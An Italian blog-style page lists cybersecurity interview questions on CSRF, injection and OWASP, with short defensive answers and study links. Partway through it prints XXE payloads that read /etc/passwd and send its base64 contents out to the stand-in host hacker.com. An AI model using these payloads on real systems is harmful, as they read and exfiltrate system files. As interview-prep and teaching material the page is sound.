
Riepilogo delle domande di colloquio sulla sicurezza informatica che ho affrontato, spero sia d'aiuto.
Questa pagina è un riepilogo dei colloqui che ho affrontato, coprendo una discreta varietà di ruoli, ricevendo diversi rifiuti, ma imparando da ogni colloquio, raccogliendo feedback costruttivi e andando avanti. Spero che queste domande/consigli possano esserti utili.
I ruoli che generalmente copre sono i seguenti:
Consiglio rapido:
Ho cercato di annotare qui di seguito tutte le possibili domande che ho incontrato e ho fornito risposte per alcune. Per il resto puoi cercare su Google le risposte specifiche e se vuoi approfondire. Inoltre, alla fine ci sono alcuni riferimenti, dai un'occhiata. Sono stati davvero utili.
Mi piacerebbe aggiungere altre domande man mano che vado avanti e controllo i miei appunti, ma apprezzerei se potessi darmi un feedback costruttivo contattandomi via [email protected]. Se incontri qualcosa che non è coperto qui, sentiti libero di condividerlo.
Cos'è la CIA?
Cos'è AAA?
OWASP Top 10
Cos'è l'XSS (Cross-site Scripting)
Cos'è il CSRF
Questa è la domanda più azzeccata che ogni intervistatore amerebbe fare
Consiglio rapido: Sii breve, se ti viene chiesto, spiega solo allora l'intera storia
Il Cross-Site Request Forgery (CSRF) è un attacco che costringe un utente finale a eseguire azioni indesiderate su un'applicazione web in cui è attualmente autenticato. Gli attacchi CSRF prendono di mira specificamente le richieste che modificano lo stato, non il furto di dati, poiché l'attaccante non ha modo di vedere la risposta alla richiesta contraffatta. Con un piccolo aiuto dell'ingegneria sociale (come l'invio di un link via email o chat), un attaccante può ingannare gli utenti di un'applicazione web spingendoli a eseguire azioni scelte dall'attaccante. Se la vittima è un utente normale, un attacco CSRF riuscito può costringere l'utente a eseguire richieste di modifica dello stato come trasferire fondi, cambiare il proprio indirizzo email e così via. Se la vittima è un account amministrativo, il CSRF può compromettere l'intera applicazione web.
Come contrastare il CSRF:
Utilizzare token Anti-CSRF
Utilizzare la same-origin policy
Utilizzo dell'intestazione Referrer
Cos'è la codifica HTML/URL
Il protocollo HTTP è stateless?
HTTP è intrinsecamente un protocollo stateless, tuttavia il server utilizza i cookie per renderlo stateful
Quali sono i tipi di injection: SQL, Command, OS
Come contrastare le SQL injection
Utilizzare query parametrizzate e stored procedure
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Da iniettare: document.xml
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
%remote; %intern; %xxe;
]>
<root>&xxe;</root> - puoi cambiare l'entità xxe in entità generale
Host esterno: http://hacker.com/evil.dtd
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
--- OPPURE ---
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'file://%payl;'>"> - considera error-based
Parlerò in generale in termini di AWS, tuttavia ci sono altri provider cloud come Azure, GCP, Digital Ocean, ecc..
Risorse di apprendimento:
https://regexone.com/ (Le Espressioni Regolari sono un must!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
Domande per colloqui Infosec:
https://danielmiessler.com/study/infosec_interview_questions
Domande Top per Pentest:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
Consigli su Python:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
Guida utente AWS:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
Approfondimento su SMB e Samba:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/